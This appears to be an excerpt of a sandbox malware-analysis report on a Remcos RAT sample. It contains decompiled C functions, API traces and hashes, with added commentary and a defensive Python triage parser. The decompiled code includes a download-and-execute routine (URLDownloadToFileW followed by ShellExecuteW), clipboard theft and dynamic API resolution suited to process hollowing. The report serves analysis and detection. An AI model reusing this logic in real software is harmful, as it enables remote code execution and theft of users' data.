                        • Part of subcall function 00750AA7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00750CCD,?,00000000), ref: 00750ADE
                        • Part of subcall function 00750AA7: RegCloseKey.ADVAPI32(00000000,?,?,?,00750CCD,?,00000000), ref: 00750AE9
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseCreateInfoParametersSystemValue
                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                      • API String ID: 4127273184-3576401099
                      • Opcode ID: 85feb78892255a093bcdca8cd1a208e69d76db539faa4a2641a17ed130805138
                      • Instruction ID: c9895eb22fdba6cfa522f95666d33c9128d6415818ed7bbc85f93b560426f5f5
                      • Opcode Fuzzy Hash: 85feb78892255a093bcdca8cd1a208e69d76db539faa4a2641a17ed130805138
                      • Instruction Fuzzy Hash: 3511BB62B8474173DD0C71395E5FFAE18129783B21F500268FE012E2DADCCF496683E2
                      Uniqueness

                      Uniqueness Score: -1.00%
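
                      The four API lines above are the whole wallpaper-change routine behind the "Contains functionalty to change the wallpaper" signature: the subcall at 00750AA7 opens HKEY_CURRENT_USER (first argument 80000001) under the subkey named in the String ID, "Control Panel\Desktop", sets the "TileWallpaper" and "WallpaperStyle" values, closes the key, and the caller then issues SystemParametersInfoW(00000014, 0, lpvParam, 00000003), i.e. SPI_SETDESKWALLPAPER with fWinIni = SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE, so the change is written to the user profile and broadcast to every top-level window. The Python below is an added example, not code from this report, from Joe Sandbox or from the Remcos sample: it parses API lines in the format the report prints, decodes the Win32 constants (values from winuser.h and winreg.h), and reduces the sequence to the three facts an analyst wants. The regular expression and the triage rules are assumptions about the line format shown here; the sample input is the four lines above, embedded as constructed text.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the four "APIs" bullet lines printed for the
# wallpaper function in this report, copied as text.  Any other report's
# "APIs" section can be fed in the same way.
SAMPLE_API_LINES = [
    "• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00758005",
    "  • Part of subcall function 00750AA7: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00750AB6",
    "  • Part of subcall function 00750AA7: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00750CCD,?,00000000), ref: 00750ADE",
    "  • Part of subcall function 00750AA7: RegCloseKey.ADVAPI32(00000000,?,?,?,00750CCD,?,00000000), ref: 00750AE9",
]

# Line shape (an assumption about the report format shown above): optional
# "Part of subcall function XXXXXXXX:" prefix, then Api.MODULE(arg,arg,...),
# ref: ADDRESS.  Arguments are 8 hex digits, or "?" where the sandbox could
# not recover the value.
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Win32 constants used by this call sequence (winuser.h / winreg.h).
SPI_ACTIONS = {0x0014: "SPI_SETDESKWALLPAPER", 0x0073: "SPI_GETDESKWALLPAPER"}
SPIF_FLAGS = {0x1: "SPIF_UPDATEINIFILE", 0x2: "SPIF_SENDWININICHANGE"}
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]      # None where the report printed "?"
    ref: int                       # call-site address
    subcall_of: Optional[int] = None


def parse_api_lines(lines):
    """Turn the report's 'APIs' bullet lines into ApiCall records."""
    calls = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue                   # headings such as "APIs" carry no call
        args = [None if a.strip() == "?" else int(a, 16)
                for a in m.group("args").split(",") if a.strip()]
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("mod"), args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


def decode_spi(action, flags):
    """Name a SystemParametersInfo uiAction and split fWinIni into flag names."""
    names = [name for bit, name in SPIF_FLAGS.items() if flags & bit]
    leftover = flags & ~sum(SPIF_FLAGS)
    if leftover:
        names.append(f"0x{leftover:x}")
    return SPI_ACTIONS.get(action, f"SPI_0x{action:04x}"), names


def triage(calls):
    """Summarise the sequence the way an analyst reads it: is the wallpaper
    replaced, is the change written to the user profile, which hive is touched."""
    findings = {"wallpaper_change": False, "persisted_to_profile": False,
                "registry_roots": []}
    for c in calls:
        if c.api.startswith("SystemParametersInfo") and c.args and c.args[0] is not None:
            flags = c.args[3] if len(c.args) > 3 and c.args[3] is not None else 0
            action, flag_names = decode_spi(c.args[0], flags)
            if action == "SPI_SETDESKWALLPAPER":
                findings["wallpaper_change"] = True
                findings["persisted_to_profile"] = "SPIF_UPDATEINIFILE" in flag_names
        elif c.api.startswith(("RegCreateKey", "RegOpenKey")) and c.args and c.args[0] is not None:
            root = HKEY_ROOTS.get(c.args[0], f"0x{c.args[0]:08x}")
            findings["registry_roots"].append(root)
    return findings


if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_API_LINES):
        print(f"{call.ref:08x} {call.api}.{call.module} {call.args}")
    print(triage(parse_api_lines(SAMPLE_API_LINES)))
```

                      Two caveats when reading the output. The "?" arguments in RegSetValueExA sit exactly where the value-name pointer and data pointer are, so the parser cannot recover the value names from the call line alone; here they come from the report's String ID field (TileWallpaper, WallpaperStyle), not from the arguments. And because fWinIni carries SPIF_UPDATEINIFILE, the change survives logoff, which makes a registry value write under HKCU\Control Panel\Desktop by a process that is not explorer.exe or the Settings app a reasonable hunting pivot (Sysmon Event ID 13 records such value sets), paired with the SystemParametersInfoW call at 00758005 if API tracing is available.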

                      C-Code - Quality: 68%
                      			E00789F58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
                      				intOrPtr* _v8;
                      				short _v12;
                      				signed int _v32;
                      				intOrPtr _v40;
                      				signed int _v52;
                      				char _v272;
                      				short _v292;
                      				void* __ebp;
                      				void* _t34;
                      				short* _t35;
                      				intOrPtr* _t36;
                      				signed int _t39;
                      				signed short* _t44;
                      				intOrPtr _t47;
                      				void* _t49;
                      				signed int _t52;
                      				signed int _t58;
                      				signed int _t60;
                      				signed int _t66;
                      				void* _t68;
                      				void* _t71;
                      				void* _t76;
                      				void* _t80;
                      				intOrPtr _t87;
                      				short* _t89;
                      				void* _t90;
                      				void* _t92;
                      				short _t94;
                      				void* _t95;
                      				intOrPtr* _t98;
                      				void* _t112;
                      				void* _t116;
                      				intOrPtr* _t118;
                      				intOrPtr _t121;
                      				signed int* _t122;
                      				intOrPtr* _t125;
                      				signed short _t127;
                      				int _t129;
                      				signed int _t132;
                      				void* _t133;
                      				signed int _t134;
                      
                      				_t115 = __edx;
                      				_push(__ecx);
                      				_push(__ecx);
                      				_push(__ebx);
                      				_push(__esi);
                      				_push(__edi);
                      				_t34 = E00781CE2(__ebx, __ecx, __edx);
                      				_t87 = _a4;
                      				_t94 = 0;
                      				_v12 = 0;
                      				_t3 = _t34 + 0x50; // 0x50
                      				_t125 = _t3;
                      				_t4 = _t125 + 0x250; // 0x2a0
                      				_t35 = _t4;
                      				 *((intOrPtr*)(_t125 + 8)) = 0;
                      				 *_t35 = 0;
                      				_t6 = _t125 + 4; // 0x54
                      				_t118 = _t6;
                      				_v8 = _t35;
                      				_t36 = _t87 + 0x80;
                      				 *_t125 = _t87;
                      				 *_t118 = _t36;
                      				if( *_t36 != 0) {
                      					E00789EE9(0x799e90, 0x16, _t118);
                      					_t133 = _t133 + 0xc;
                      					_t94 = 0;
                      				}
                      				_push(_t125);
                      				if( *((intOrPtr*)( *_t125)) == _t94) {
                      					E0078985A(_t87, _t94, _t115, _t118, __eflags);
                      					goto L12;
                      				} else {
                      					if( *((intOrPtr*)( *_t118)) == _t94) {
                      						E0078997D();
                      					} else {
                      						E007898E3(_t94);
                      					}
                      					_pop(_t95);
                      					if( *((intOrPtr*)(_t125 + 8)) == 0) {
                      						_t80 = E00789EE9(0x799b80, 0x40, _t125);
                      						_t133 = _t133 + 0xc;
                      						if(_t80 != 0) {
                      							_push(_t125);
                      							if( *((intOrPtr*)( *_t118)) == 0) {
                      								E0078997D();
                      							} else {
                      								E007898E3(0);
                      							}
                      							L12:
                      							_pop(_t95);
                      						}
                      					}
                      				}
                      				if( *((intOrPtr*)(_t125 + 8)) == 0) {
                      					L31:
                      					_t39 = 0;
                      					__eflags = 0;
                      					goto L32;
                      				} else {
                      					_t127 = E00789DB7(_t95, _t87 + 0x100, _t125);
                      					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
                      						goto L31;
                      					} else {
                      						_t44 = _a8;
                      						if(_t44 != 0) {
                      							 *_t44 = _t127;
                      						}
                      						_t121 = _a12;
                      						if(_t121 == 0) {
                      							L30:
                      							_t39 = 1;
                      							goto L32;
                      						} else {
                      							_t98 = _v8;
                      							_t15 = _t121 + 0x120; // 0x77e3e8
                      							_t89 = _t15;
                      							 *_t89 = 0;
                      							_t116 = _t98 + 2;
                      							do {
                      								_t47 =  *_t98;
                      								_t98 = _t98 + 2;
                      							} while (_t47 != _v12);
                      							_t100 = _t98 - _t116 >> 1;
                      							_push((_t98 - _t116 >> 1) + 1);
                      							_t49 = E00788349(_t98 - _t116 >> 1, _t89, 0x55, _v8);
                      							_t134 = _t133 + 0x10;
                      							_t153 = _t49;
                      							if(_t49 != 0) {
                      								_push(0);
                      								_push(0);
                      								_push(0);
                      								_push(0);
                      								_push(0);
                      								E0077698A();
                      								asm("int3");
                      								_t132 = _t134;
                      								_t52 =  *0x7aa00c; // 0x67a7e35e
                      								_v52 = _t52 ^ _t132;
                      								_push(_t89);
                      								_push(_t127);
                      								_push(_t121);
                      								_t90 = E00781CE2(_t89, _t100, _t116);
                      								_t122 =  *(E00781CE2(_t90, _t100, _t116) + 0x34c);
                      								_t129 = E0078A66B(_v40);
                      								asm("sbb ecx, ecx");
                      								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                      								__eflags = _t58;
                      								if(_t58 != 0) {
                      									_t60 = E0078CF51(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
                      									__eflags = _t60;
                      									if(_t60 == 0) {
                      										_t66 = E0078A79F(_t129);
                      										__eflags = _t66;
                      										if(_t66 != 0) {
                      											 *_t122 =  *_t122 | 0x00000004;
                      											__eflags =  *_t122;
                      											_t122[2] = _t129;
                      											_t122[1] = _t129;
                      										}
                      									}
                      									__eflags =  !( *_t122 >> 2) & 0x00000001;
                      								} else {
                      									 *_t122 =  *_t122 & _t58;
                      								}
                      								__eflags = _v32 ^ _t132;
                      								return E0076FD1B(_v32 ^ _t132);
                      							} else {
                      								_t68 = E007823BA(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
                      								_t154 = _t68;
                      								if(_t68 == 0) {
                      									goto L31;
                      								} else {
                      									_t20 = _t121 + 0x80; // 0x77e348
                      									_t92 = _t20;
                      									_t21 = _t121 + 0x120; // 0x77e3e8
                      									if(E007823BA(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
                      										goto L31;
                      									} else {
                      										_push(0x5f);
                      										_t71 = E00790FF7(_t100);
                      										_t112 = _t92;
                      										if(_t71 != 0) {
                      											L28:
                      											_t22 = _t121 + 0x120; // 0x77e3e8
                      											if(E007823BA(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
                      												goto L31;
                      											} else {
                      												goto L29;
                      											}
                      										} else {
                      											_push(0x2e);
                      											_t76 = E00790FF7(_t112);
                      											_t112 = _t92;
                      											_t157 = _t76;
                      											if(_t76 == 0) {
                      												L29:
                      												_t23 = _t121 + 0x100; // 0x77e3c8
                      												E0077BB3C(_t112, _t127, _t23, 0x10, 0xa);
                      												goto L30;
                      											} else {
                      												goto L28;
                      											}
                      										}
                      									}
                      								}
                      								L32:
                      								return _t39;
                      							}
                      						}
                      					}
                      				}
                      			}

                      Instruction addresses for E00789F58 above: the per-line address column starts at 0x00789f58 and is truncated at 0x0078a04f in this extract (its alignment with the C-code lines was lost in extraction and it is not reproduced here).
                      0x0078a051
                      0x0078a056
                      0x0078a10c
                      0x0078a10e
                      0x00000000
                      0x0078a05c
                      0x0078a05c
                      0x0078a05f
                      0x0078a05f
                      0x0078a067
                      0x0078a06a
                      0x0078a06d
                      0x0078a06d
                      0x0078a070
                      0x0078a073
                      0x0078a07b
                      0x0078a080
                      0x0078a087
                      0x0078a08c
                      0x0078a08f
                      0x0078a091
                      0x0078a11c
                      0x0078a11d
                      0x0078a11e
                      0x0078a11f
                      0x0078a120
                      0x0078a121
                      0x0078a126
                      0x0078a12a
                      0x0078a132
                      0x0078a139
                      0x0078a13c
                      0x0078a13d
                      0x0078a141
                      0x0078a147
                      0x0078a14f
                      0x0078a15e
                      0x0078a16a
                      0x0078a17b
                      0x0078a181
                      0x0078a183
                      0x0078a194
                      0x0078a19b
                      0x0078a19d
                      0x0078a1a0
                      0x0078a1a6
                      0x0078a1a8
                      0x0078a1aa
                      0x0078a1aa
                      0x0078a1ad
                      0x0078a1b0
                      0x0078a1b0
                      0x0078a1a8
                      0x0078a1ba
                      0x0078a185
                      0x0078a185
                      0x0078a187
                      0x0078a1c2
                      0x0078a1cd
                      0x0078a097
                      0x0078a0a0
                      0x0078a0a5
                      0x0078a0a7
                      0x00000000
                      0x0078a0a9
                      0x0078a0ab
                      0x0078a0ab
                      0x0078a0b7
                      0x0078a0c5
                      0x00000000
                      0x0078a0c7
                      0x0078a0c7
                      0x0078a0ca
                      0x0078a0d0
                      0x0078a0d3
                      0x0078a0e3
                      0x0078a0e8
                      0x0078a0f6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0078a0d5
                      0x0078a0d5
                      0x0078a0d8
                      0x0078a0de
                      0x0078a0df
                      0x0078a0e1
                      0x0078a0f8
                      0x0078a0fc
                      0x0078a104
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0078a0e1
                      0x0078a0d3
                      0x0078a0c5
                      0x0078a113
                      0x0078a119
                      0x0078a119
                      0x0078a091
                      0x0078a056
                      0x0078a018

                      APIs
                        • Part of subcall function 00781CE2: GetLastError.KERNEL32(00000000,?,00775545,?,?,?,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781CE6
                        • Part of subcall function 00781CE2: _free.LIBCMT ref: 00781D19
                        • Part of subcall function 00781CE2: SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D5A
                        • Part of subcall function 00781CE2: _abort.LIBCMT ref: 00781D60
                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0077E2C8,?,?,?,?,0077DD1F,?,00000004), ref: 0078A03A
                      • _wcschr.LIBVCRUNTIME ref: 0078A0CA
                      • _wcschr.LIBVCRUNTIME ref: 0078A0D8
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0077E2C8,00000000,0077E3E8), ref: 0078A17B
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                      • String ID:
                      • API String ID: 4212172061-0
                      • Opcode ID: 83d938ad725cb63a3d5d4c7bacea7bc90b82ebfd9bb2f685f9f57292568e3aca
                      • Instruction ID: 2388c68be71d553a25f9b771656ebcc5ee3e6a24f6fe558f0070ed19411c03b1
                      • Opcode Fuzzy Hash: 83d938ad725cb63a3d5d4c7bacea7bc90b82ebfd9bb2f685f9f57292568e3aca
                      • Instruction Fuzzy Hash: 6661DB71680606FAEB25BB74DC4AABAB3ACEF04710F14442AFA05D7581FB7CE941C761
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E00745C8B(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                      				char _v28;
                      				char _v44;
                      				char _v60;
                      				char _v64;
                      				char _v68;
                      				char _v72;
                      				char _v76;
                      				char _v84;
                      				void* _v104;
                      				void* __ebx;
                      				void* __ebp;
                      				intOrPtr* _t33;
                      				void* _t50;
                      				signed char _t54;
                      				intOrPtr* _t57;
                      				void* _t59;
                      				void* _t63;
                      				void* _t70;
                      				void* _t72;
                      				void* _t77;
                      				intOrPtr* _t79;
                      				void* _t81;
                      				void* _t83;
                      				void* _t84;
                      				void* _t86;
                      				void* _t88;
                      				void* _t106;
                      				void* _t120;
                      				void* _t144;
                      				void* _t148;
                      				signed int _t155;
                      				void* _t158;
                      				void* _t159;
                      				void* _t160;
                      				void* _t162;
                      				void* _t166;
                      				void* _t167;
                      
                      				_t167 = __eflags;
                      				_t140 = __edx;
                      				_t33 = E00741F95( &_a8);
                      				_push(0xffffffff);
                      				_t88 = 4;
                      				_push(_t88);
                      				_push( &_v28);
                      				E007442A6( &_a8);
                      				_t158 = (_t155 & 0xfffffff8) - 0x2c;
                      				E007420EC(_t88, _t158, __edx, _t167, 0x7ac238);
                      				_t159 = _t158 - 0x18;
                      				E007420EC(_t88, _t159, __edx, _t167,  &_v44);
                      				E00757478( &_v84, _t140);
                      				_t160 = _t159 + 0x30;
                      				_t148 =  *_t33 - _t88;
                      				if(_t148 == 0) {
                      					_t144 = 0;
                      					E00741E49( &_v64, _t140, __eflags, 0);
                      					_t141 = "F";
                      					__eflags = E00745A6F("F");
                      					if(__eflags == 0) {
                      						E00741E49( &_v68, "F", __eflags, 0);
                      						_t140 = "M";
                      						__eflags = E00745A6F("M");
                      						if(__eflags == 0) {
                      							L23:
                      							E00741E74( &_v64, _t140);
                      							E00741FC7();
                      							E00741FC7();
                      							return 0;
                      						}
                      						_v68 = 0;
                      						_t50 = E00741F95(E00741E49( &_v64, "M", __eflags, _t88));
                      						_t140 =  &_v76;
                      						__eflags = E00757111(_t50,  &_v76,  &_v68);
                      						if(__eflags == 0) {
                      							_t106 = _t160 - 0x18;
                      							_push("2");
                      							L22:
                      							E00742084(_t88, _t106);
                      							_push(0xb3);
                      							E00744AA4(_t88, _a4, _t140, __eflags);
                      							goto L23;
                      						}
                      						_t140 = _v72;
                      						_t54 = E0075432B(0x7abb08);
                      						L007794F1(_v72);
                      						_t162 = _t160 - 0x18;
                      						__eflags = (_t54 & 0x000000ff) - 1;
                      						L9:
                      						_t106 = _t162;
                      						if(__eflags != 0) {
                      							_push("3");
                      						} else {
                      							_push("1");
                      						}
                      						goto L22;
                      					}
                      					_t57 = E00741F95(E00741E49( &_v68, "F", __eflags, 2));
                      					_t59 = E00741F95(E00741E49( &_v68, _t141, __eflags, 3));
                      					_t140 =  *_t57;
                      					E0075805B( &_v60,  *_t57, _t59);
                      					_t63 = E00741F95(E00741E49( &_v72,  *_t57, __eflags, _t88));
                      					__imp__URLDownloadToFileW(0, _t63, E00741EEB( &_v60), 0, 0);
                      					__eflags = _t63;
                      					if(__eflags == 0) {
                      						L4:
                      						if( *((char*)(E00741F95(E00741E49( &_v84, _t140, _t171, 1)))) == 0) {
                      							_t120 = _t160 - 0x18;
                      							_push("0");
                      						} else {
                      							_t70 = ShellExecuteW(_t144, L"open", E00741EEB( &_v72), _t144, _t144, 1);
                      							_t120 = _t160 - 0x18;
                      							_t173 = _t70 - 0x20;
                      							if(_t70 > 0x20) {
                      								_push("1");
                      							} else {
                      								_push("3");
                      							}
                      						}
                      						L17:
                      						E00742084(_t88, _t120);
                      						_push(0xb3);
                      						E00744AA4(_t88, _a4, _t140, _t173);
                      						E00741EF0();
                      						goto L23;
                      					}
                      					L14:
                      					_t120 = _t160 - 0x18;
                      					_push("2");
                      					goto L17;
                      				}
                      				_t169 = _t148 != 1;
                      				if(_t148 != 1) {
                      					goto L23;
                      				}
                      				_t144 = 0;
                      				E00741E49( &_v64, _t140, _t169, 0);
                      				_t142 = "F";
                      				_t72 = E00745A6F("F");
                      				_t170 = _t72;
                      				if(_t72 == 0) {
                      					E00741E49( &_v68, "F", __eflags, 0);
                      					_t140 = "M";
                      					__eflags = E00745A6F("M");
                      					if(__eflags == 0) {
                      						goto L23;
                      					} else {
                      						_t140 = E00741F95(E00741E49( &_v64, "M", __eflags, _t88));
                      						_t77 = E0075432B(0x7abb08);
                      						_t162 = _t160 - 0x18;
                      						__eflags = _t77 - 1;
                      						goto L9;
                      					}
                      				}
                      				_t79 = E00741F95(E00741E49( &_v68, "F", _t170, 2));
                      				_t81 = E00741F95(E00741E49( &_v68, _t142, _t170, 3));
                      				_t140 =  *_t79;
                      				E0075805B( &_v60,  *_t79, _t81);
                      				_t83 = E00741EEB( &_v60);
                      				_t84 = E00741E49( &_v72,  *_t79, _t170, _t88);
                      				_t166 = _t160 - 0x18;
                      				E007420EC(_t88, _t166, _t140, _t170, _t84);
                      				_t86 = E00757A4E(_t83);
                      				_t160 = _t166 + 0x18;
                      				_t171 = _t86 - 1;
                      				if(_t86 != 1) {
                      					goto L14;
                      				}
                      				goto L4;
			}

                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00745DA3
                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00745E87
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: DownloadExecuteFileShell
                      • String ID: open
                      • API String ID: 2825088817-2758837156
                      • Opcode ID: 7bdac947a3f6a8f115a64497b3f5879001f1d41ee875384c12e984e77753eadf
                      • Instruction ID: 1ddffe4f200b040bcd6007a9e973db3f6eff9ab60edf4e9835875e9c9d558d4d
                      • Opcode Fuzzy Hash: 7bdac947a3f6a8f115a64497b3f5879001f1d41ee875384c12e984e77753eadf
                      • Instruction Fuzzy Hash: F761A272A04310E7CB14FAB5985F97E77A95F96300F80092DF946AB1D3EF2C9A49C252
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 50%
                      			E00749BD9(intOrPtr _a4) {
                      				void* _t8;
                      				void* _t10;
                      
                      				if(OpenClipboard(0) == 0) {
                      					L3:
                      					_push(0x79f724);
                      				} else {
                      					_t10 = GetClipboardData(0xd);
                      					CloseClipboard();
                      					if(_t10 == 0) {
                      						goto L3;
                      					} else {
                      						_push(_t10);
                      					}
                      				}
                      				E0074427F(_t8, _a4);
                      				return _a4;
			}

                      APIs
                      • OpenClipboard.USER32(00000000), ref: 00749BDF
                      • GetClipboardData.USER32 ref: 00749BEB
                      • CloseClipboard.USER32(?,00749C74,007492D9,?,00000000,00000000), ref: 00749BF3
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Clipboard$CloseDataOpen
                      • String ID:
                      • API String ID: 2058664381-0
                      • Opcode ID: 79d2a38c74b0cc9cd930a7ba820863f8f7c360cf991b59eb5d0495f637922266
                      • Instruction ID: ddf9d8eac0a6848b00180d2ee301819ed16ff15e2f2c7b786f5ece619e14c4c3
                      • Opcode Fuzzy Hash: 79d2a38c74b0cc9cd930a7ba820863f8f7c360cf991b59eb5d0495f637922266
                      • Instruction Fuzzy Hash: 1CE08635284214EBC610ABF1EC49B9A7B98BB01B91F054022FA09DA150DB689900C6B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0074CD09() {
                      				_Unknown_base(*)()* _t2;
                      				_Unknown_base(*)()* _t24;
                      
                      				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
                      				 *0x7abd2c = _t2;
                      				if(_t2 == 0) {
                      					 *0x7abd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                      				}
                      				 *0x7abd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                      				if( *0x7abd2c == 0) {
                      					 *0x7abd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                      				}
                      				 *0x7abd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                      				 *0x7abd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                      				 *0x7abeac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                      				 *0x7abeb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                      				 *0x7abd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                      				 *0x7abd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                      				 *0x7abd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                      				 *0x7abd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                      				 *0x7abd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                      				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                      				 *0x7abb04 = _t24;
                      				return _t24;
			}

                      APIs
                      • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00000000,007AC548,00000001,0074C505), ref: 0074CD1C
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CD25
                      • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0074CD40
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CD43
                      • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0074CD54
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CD57
                      • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0074CD71
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CD74
                      • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0074CD85
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CD88
                      • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0074CD99
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CD9C
                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0074CDAD
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CDB0
                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0074CDC1
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CDC4
                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0074CDD5
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CDD8
                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0074CDE9
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CDEC
                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0074CDFD
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CE00
                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0074CE11
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CE14
                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0074CE25
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CE28
                      • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0074CE36
                      • GetProcAddress.KERNEL32(00000000), ref: 0074CE39
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: AddressProc$HandleModule$LibraryLoad
                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                      • API String ID: 551388010-3474354060
                      • Opcode ID: c618c1af83d185922aacd323b025f50da08fdcb7e7759af197a2c0b6990814ad
                      • Instruction ID: 5dcf3ab44421122cb02e41b72807662552b045c3730b1013e0f85436dc05fc22
                      • Opcode Fuzzy Hash: c618c1af83d185922aacd323b025f50da08fdcb7e7759af197a2c0b6990814ad
                      • Instruction Fuzzy Hash: 3721BFE0F8139879C6107BB26C4ED1B2E98EACBB55B008E16B10497191EBBC8510CEE9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E00754906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
                      				void* _v12;
                      				char _v13;
                      				struct HDC__* _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				int _v32;
                      				int _v36;
                      				struct HDC__* _v40;
                      				void* _v46;
                      				intOrPtr _v50;
